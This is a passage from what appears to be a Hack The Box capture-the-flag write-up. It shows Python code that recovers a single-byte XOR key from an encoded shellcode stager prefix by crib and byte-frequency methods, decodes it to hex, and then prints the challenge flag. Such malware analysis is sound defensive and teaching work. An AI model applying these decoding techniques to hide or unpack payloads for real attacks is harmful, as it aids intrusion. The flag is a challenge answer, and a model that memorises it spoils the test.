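    return bytes(b ^ key for b in data)


def recover_key_by_crib(blob, crib):
    """Single-byte keys under which blob starts with crib (XOR is a bijection, so at most one)."""
    return [k for k in range(256) if xor_decode(blob[: len(crib)], k) == crib]


def recover_key_by_frequency(blob):
    """Heuristic: shellcode contains many 0x00 bytes (zero-extended immediates,
    padding), so the most frequent ciphertext byte is usually key ^ 0x00 == key.
    Cross-check it with the crib method; on a short sample it can be wrong."""
    return max(range(256), key=lambda k: blob.count(k))


def analyse(prefix_b64=VAR_CODE_PREFIX_B64):
    """Apply both recovery methods and return the decoded prefix as hex."""
    blob = base64.b64decode(prefix_b64)
    keys = recover_key_by_crib(blob, X64_STAGER_PROLOGUE)
    return {
        "crib_keys": keys,
        "frequency_key": recover_key_by_frequency(blob),
        # after the prologue the stager continues with call <api-resolver>; push r9
        "decoded_prefix": xor_decode(blob, keys[0]).hex() if keys else None,
    }


if __name__ == "__main__":
    print(analyse())
```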
Flag
At this point, we have the flag:
[+] Here is the flag: HTB{GSH33ts_4nd_str4ng3_f0rmula3_1s_4_g00d_w4y_f0r_byp4ss1ng_f1r3w4lls!!}